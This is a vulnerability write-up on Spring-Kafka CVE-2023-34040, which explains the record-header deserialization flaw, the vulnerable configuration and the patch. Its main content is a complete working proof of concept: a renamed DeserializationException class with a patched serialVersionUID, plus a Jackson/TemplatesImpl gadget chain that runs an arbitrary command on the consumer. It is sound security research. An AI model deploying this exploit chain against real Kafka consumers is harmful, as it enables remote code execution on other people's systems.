Spring-Kafka CVE-2023-34040

Preface

The official description: in affected versions, with an insecure configuration, an attacker can construct a malicious serialized object that is triggered when record headers are deserialized.

Vulnerability conditions:

  • The user does not configure an ErrorHandlingDeserializer

  • The user explicitly sets checkDeserExWhenKeyNull and checkDeserExWhenValueNull to true

  • The user allows untrusted sources to publish messages to a Kafka topic

Attack target:

  • consumer

Affected versions:

  • Spring-Kafka

    • 2.8.1 ~ 2.9.10

    • 3.0.0 ~ 3.0.9

Kafka Intro

Kafka is a distributed message queue based on the publish/subscribe model.

How publish/subscribe works:

  • A Publisher publishes messages to a Topic, and multiple Subscribers consume them

  • Unlike point-to-point messaging, a message published to a Topic is consumed by multiple Subscribers

  • Topic: the subject of the messages; effectively the message queue itself. Kafka's data lives in topics, and each broker can host multiple topics.

  • Partition: a shard of a Topic. Each topic can have multiple partitions, which spread the load and raise Kafka's throughput. Data is not duplicated across partitions of the same topic, and on disk each partition is simply a directory. For example, if a topic has 5 partitions and you push 1,000 records to Kafka at once, by default those records are distributed over the 5 partitions, about 200 per partition.

  • Consumer Group: several consumers grouped together. By Kafka's design, each partition's data is consumed by exactly one consumer within a group, while consumers in the same group can consume different partitions of the same topic (see the sketch below).
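
As a quick illustration (a sketch with arbitrary listener ids and group names): two listeners sharing a group id split the topic's partitions between them, while a listener in a different group receives its own copy of every record.

import org.springframework.kafka.annotation.KafkaListener;
import org.springframework.stereotype.Component;

@Component
public class GroupDemo {
    // worker-1 and worker-2 share group g1: each partition of myTopic is
    // consumed by exactly one of the two
    @KafkaListener(id = "worker-1", topics = "myTopic", groupId = "g1")
    public void worker1(String in) { System.out.println("g1/worker-1: " + in); }

    @KafkaListener(id = "worker-2", topics = "myTopic", groupId = "g1")
    public void worker2(String in) { System.out.println("g1/worker-2: " + in); }

    // a different group id gets every record again
    @KafkaListener(id = "auditor", topics = "myTopic", groupId = "g2")
    public void auditor(String in) { System.out.println("g2/auditor: " + in); }
}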

A Kafka record (also called a Message or Event) consists of a header and a body. The header stores metadata such as the topic, partition, and timestamp; the body is a key/value pair.
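
Record headers are plain name/byte[] pairs that a producer can attach to any record; this is exactly the surface the exploit later abuses. A minimal sketch using the kafka-clients API (topic name, key, and values are placeholders):

import org.apache.kafka.clients.producer.ProducerRecord;

import java.nio.charset.StandardCharsets;

public class HeaderDemo {
    public static ProducerRecord<String, String> recordWithHeader() {
        // body = the key/value pair; headers carry metadata alongside it
        ProducerRecord<String, String> record = new ProducerRecord<>("myTopic", "key", "value");
        record.headers().add("traceId", "abc123".getBytes(StandardCharsets.UTF_8));
        return record;
    }
}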

Quick Start

Set up the Kafka environment; it depends on ZooKeeper.

If you are not deploying on your local machine, change KAFKA_ADVERTISED_LISTENERS below to your own IP; for a local setup, localhost is fine.

docker-compose.yml:

version: '2'
services:
  zookeeper:
    image: confluentinc/cp-zookeeper:latest
    environment:
      ZOOKEEPER_CLIENT_PORT: 2181
      ZOOKEEPER_TICK_TIME: 2000
    ports:
      - 22181:2181
  
  kafka:
    image: confluentinc/cp-kafka:latest
    depends_on:
      - zookeeper
    ports:
      - 29092:29092
    environment:
      KAFKA_BROKER_ID: 1
      KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181
      KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://192.168.73.129:29092
      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT
      KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
      KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1

For the clients (producer and consumer), follow the official documentation; 2.9.10 is used as the example:

https://docs.spring.io/spring-kafka/docs/2.9.10/reference/html/#getting-started

Scaffold the project with Spring Initializr; it automatically picks the spring-kafka version matching the Spring version.

Producer:

package com.demo.producer;

import org.apache.kafka.clients.admin.NewTopic;
import org.springframework.boot.ApplicationRunner;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;
import org.springframework.kafka.config.TopicBuilder;
import org.springframework.kafka.core.KafkaTemplate;

@SpringBootApplication
public class ProducerApplication {

    public static void main(String[] args) {
        SpringApplication.run(ProducerApplication.class, args);
    }

    @Bean
    public NewTopic topic() {
        return TopicBuilder.name("myTopic")
                .partitions(10)
                .replicas(1)
                .build();
    }

    @Bean
    public ApplicationRunner runner(KafkaTemplate<String, String> template) {
        return args -> {
            template.send("myTopic", "test");
        };
    }
}
application.properties:

server.port=8080
spring.kafka.bootstrap-servers=192.168.73.129:29092

Consumer:

package com.demo.comsumer;

import org.apache.kafka.clients.admin.NewTopic;
import org.apache.kafka.clients.consumer.ConsumerConfig;
import org.apache.kafka.common.serialization.StringDeserializer;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.boot.autoconfigure.kafka.KafkaProperties;
import org.springframework.context.annotation.Bean;
import org.springframework.kafka.annotation.KafkaListener;
import org.springframework.kafka.config.ConcurrentKafkaListenerContainerFactory;
import org.springframework.kafka.config.TopicBuilder;
import org.springframework.kafka.core.DefaultKafkaConsumerFactory;

import java.util.HashMap;
import java.util.Map;

@SpringBootApplication
public class ConsumerApplication {

    public static void main(String[] args) {
        SpringApplication.run(ConsumerApplication.class, args);
    }
    @Bean
    public NewTopic topic() {
        return TopicBuilder.name("myTopic")
            .partitions(10)
            .replicas(1)
            .build();
    }
    @Autowired
    private KafkaProperties kafkaProperties;

    @Bean
    public ConcurrentKafkaListenerContainerFactory<String, String> kafkaListenerContainerFactory() {
        Map<String, Object> props = new HashMap<>();
        props.put(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, kafkaProperties.getBootstrapServers());
        props.put(ConsumerConfig.KEY_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);
        props.put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);

        ConcurrentKafkaListenerContainerFactory<String, String> factory = new ConcurrentKafkaListenerContainerFactory<>();
        factory.setConsumerFactory(new DefaultKafkaConsumerFactory<>(props));
        factory.getContainerProperties().setCheckDeserExWhenKeyNull(true);   // vulnerable switch #1
        factory.getContainerProperties().setCheckDeserExWhenValueNull(true); // vulnerable switch #2
        return factory;
    }

    @KafkaListener(id = "myId", topics = "myTopic")
    public void listen(String in) {
        System.out.println(in);
    }
}
application.properties:

server.port=8088
spring.kafka.consumer.auto-offset-reset=earliest
spring.kafka.bootstrap-servers=192.168.73.129:29092

Start the producer and the consumer; the consumer receives the message successfully.

Analysis

Per the official documentation, when checkDeserExWhenKeyNull and checkDeserExWhenValueNull are set to true, the DeserializationException header is checked whenever a received record's key or value is null.

org.springframework.kafka.listener.ListenerUtils#getExceptionFromHeader

From the record headers, this method reads the value of KEY_DESERIALIZER_EXCEPTION_HEADER (the springDeserializerExceptionKey seen here) and attempts to deserialize it into a DeserializationException object.

Two frames up the call stack, the container checks whether the record's key or value is null and whether the corresponding checkNullKeyForExceptions or checkNullValueForExceptions flag is enabled, as sketched below.
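
The surrounding logic, paraphrased and simplified from the spring-kafka 2.9.x sources (method and field names approximate):

// KafkaMessageListenerContainer.ListenerConsumer -- simplified paraphrase
private void invokeOnMessage(final ConsumerRecord<K, V> cRecord) {
    if (cRecord.value() == null && this.checkNullValueForExceptions) {
        checkDeser(cRecord, SerializationUtils.VALUE_DESERIALIZER_EXCEPTION_HEADER);
    }
    if (cRecord.key() == null && this.checkNullKeyForExceptions) {
        checkDeser(cRecord, SerializationUtils.KEY_DESERIALIZER_EXCEPTION_HEADER);
    }
    // ... hand the record to the @KafkaListener method
}

private void checkDeser(final ConsumerRecord<K, V> cRecord, String headerName) {
    // getExceptionFromHeader deserializes the header value -- the vulnerable step
    DeserializationException exception = ListenerUtils.getExceptionFromHeader(cRecord, headerName, this.logger);
    if (exception != null) {
        throw exception;
    }
}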

Note that a message built with MessageBuilder.withPayload has only a value and no key.

Step into byteArrayToDeserializationException.

It constructs an ObjectInputStream over the header value and overrides its resolveClass method.

During deserialization, it checks that the name of the first class encountered is org.springframework.kafka.support.serializer.DeserializationException.

After that first check, first is set to false, so the classes nested inside the outer object are no longer subject to the restriction.
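
A simplified paraphrase of byteArrayToDeserializationException (abbreviated from the 2.9.x sources) shows both behaviors: the class-name check on the outermost object, and the first flag that disables it for everything nested inside:

// ListenerUtils -- simplified paraphrase
public static DeserializationException byteArrayToDeserializationException(LogAccessor logger, byte[] value) {
    try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(value)) {

        private boolean first = true;

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            // only the OUTERMOST class name is validated...
            if (this.first && !desc.getName().equals(DeserializationException.class.getName())) {
                throw new IOException("Header does not contain a DeserializationException");
            }
            // ...everything nested below it is resolved without restriction
            this.first = false;
            return super.resolveClass(desc);
        }
    }) {
        return (DeserializationException) ois.readObject();
    }
    catch (IOException | ClassNotFoundException ex) {
        throw new IllegalStateException(ex);
    }
}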

But looking at the fields of DeserializationException, none of them is directly exploitable.

The trick used here: place a modified copy of the DeserializationException class on the attacker's classpath. To avoid a clash with the class from the project's dependencies, rename the org prefix of its package to xrg, then later patch the package name in the serialized bytes back to org.

One problem remains: modifying the class changes its serialVersionUID. Deserialization verifies this value, and if it differs from the one computed on the receiving side, an exception is thrown.

The fix is to hard-code the serialVersionUID in the modified class. The helper below prints the original value:

import org.springframework.kafka.support.serializer.DeserializationException;

import java.io.ObjectStreamClass;
import java.lang.reflect.Constructor;

public class Calc {
    public static void main(String[] args) throws Exception {
        // compute the serialVersionUID of the real DeserializationException
        // (equivalent to ObjectStreamClass.lookup(...).getSerialVersionUID())
        Class<?> clazz = Class.forName("java.io.ObjectStreamClass");
        Constructor<?> con = clazz.getDeclaredConstructor(Class.class);
        con.setAccessible(true);
        ObjectStreamClass osc = (ObjectStreamClass) con.newInstance(DeserializationException.class);
        System.out.println(osc.getSerialVersionUID());
    }
}

The modified class, with an attacker-controlled field and the hard-coded serialVersionUID:

package xrg.springframework.kafka.support.serializer;

import java.io.Serializable;

public class DeserializationException implements Serializable {

    private static final long serialVersionUID = 8280022391259546509L;

    // arbitrary nested object; deserialized without the class-name restriction
    private Object evil;

    public DeserializationException(Object evil) {
        this.evil = evil;
    }
}

Since this is a spring-kafka application, it very likely also has the spring-boot-starter-web dependency (don't ask why; the official demo depends on spring-web too).

So we fire the Jackson gadget chain that ships with Spring Web, using the stabilized variant of the chain published by other researchers: BadAttributeValueExpException.readObject() calls POJONode.toString(), Jackson then serializes the wrapped bean by invoking its getters, and a JDK dynamic proxy forwards the resulting getOutputProperties() call to a malicious TemplatesImpl, which loads the attacker's bytecode.

Modify the producer code (the fragment below additionally needs imports for javassist's ClassPool, CtClass, and CtMethod, plus Spring's MessageBuilder, KafkaHeaders, and SerializationUtils):

static {
    try {
        // strip BaseJsonNode.writeReplace via javassist so that POJONode
        // serializes as-is instead of being replaced during writeObject
        CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode");
        CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
        ctClass.removeMethod(writeReplace);
        ctClass.toClass();
    } catch (Exception e) {
        throw new RuntimeException(e);
    }
}
@Bean
public ApplicationRunner runner(KafkaTemplate<Object, Object> template) {
    return args -> {
        // alternative route (not sent here): a record with a null value plus the
        // springDeserializerExceptionValue header triggers checkDeserExWhenValueNull
        ProducerRecord<Object, Object> producerRecord = new ProducerRecord<>("myTopic", "key", null);
        producerRecord.headers().add("springDeserializerExceptionValue", PayloadGeneration.getPayload("calc"));
        // what is actually sent: a key-less message carrying the malicious
        // key-exception header, triggering checkDeserExWhenKeyNull on the consumer
        template.send(MessageBuilder
                      .withPayload("whatever")
                      .setHeader(KafkaHeaders.TOPIC, "myTopic")
                      .setHeader(SerializationUtils.KEY_DESERIALIZER_EXCEPTION_HEADER, PayloadGeneration.getPayload("calc")).build());
    };
}

PayloadGeneration:
package com.demo.producer;

import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.springframework.aop.framework.AdvisedSupport;
import xrg.springframework.kafka.support.serializer.DeserializationException;

import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;

public class PayloadGeneration {
    public static byte[] ser(final Object obj) throws Exception {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(obj);
        oos.close(); // flush the ObjectOutputStream's block buffer before reading the bytes
        return baos.toByteArray();
    }
    public static byte[] getPayload(String cmd) throws Exception {
        POJONode node = new POJONode(makeTemplatesImplAopProxy(cmd));
        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        setFieldValue(val, "val", node);

        DeserializationException exception = new DeserializationException(val);
        byte[] data = ser(exception);
        // serialized stream: AC ED 00 05 73 72 00 <len> x r g ...
        // byte 8 is the 'x' of "xrg"; patch it back to 'o' so the class name
        // reads org.springframework.kafka.support.serializer.DeserializationException
        data[8] = "o".getBytes()[0];
        return data;
    }
    public static Object makeTemplatesImpl(String cmd) throws Exception {
        // build a TemplatesImpl whose translet bytecode runs the command when loaded
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.makeClass("a");
        CtClass superClass = pool.get(AbstractTranslet.class.getName());
        clazz.setSuperclass(superClass);
        CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
        constructor.setBody("Runtime.getRuntime().exec(\"" + cmd + "\");");
        clazz.addConstructor(constructor);
        byte[][] bytes = new byte[][]{clazz.toBytecode()};
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setFieldValue(templates, "_bytecodes", bytes);
        setFieldValue(templates, "_name", "test");
        // note: some JDK builds require _tfactory to be a TransformerFactoryImpl
        // instance rather than null
        setFieldValue(templates, "_tfactory", null);
        return templates;
    }
    public static Object makeTemplatesImplAopProxy(String cmd) throws Exception {
        // wrap the TemplatesImpl in a Spring AOP JDK dynamic proxy exposing only the
        // Templates interface; Jackson's getter scan then reaches getOutputProperties()
        // on the underlying TemplatesImpl through the proxy
        AdvisedSupport advisedSupport = new AdvisedSupport();
        advisedSupport.setTarget(makeTemplatesImpl(cmd));
        Constructor constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class);
        constructor.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport);
        Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, handler);
        return proxy;
    }

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

Patch

The fix restricts the record header to the DeserializationException type itself, which a client cannot control.
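
A simplified paraphrase of the fixed check (from the patch commit linked in the references): the header must be the framework's own internal header subclass, which only the consumer side ever creates, so serialized bytes arriving from a producer are ignored.

// SerializationUtils in patched versions -- simplified paraphrase
Header header = record.headers().lastHeader(headerName);
if (header != null && !(header instanceof DeserializationExceptionHeader)) {
    logger.warn(() -> "Foreign deserialization exception header ignored; possible attack?");
    return null;
}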

Ref

  • https://spring.io/security/cve-2023-34040

  • https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040

  • https://xz.aliyun.com/t/12846

  • https://github.com/spring-projects/spring-kafka/commit/25ac793a78725e2ca4a3a2888a1506a4bfcf0c9d

  • https://blog.pyn3rd.com/2023/09/15/CVE-2023-34040-Spring-Kafka-Deserialization-Remote-Code-Execution/
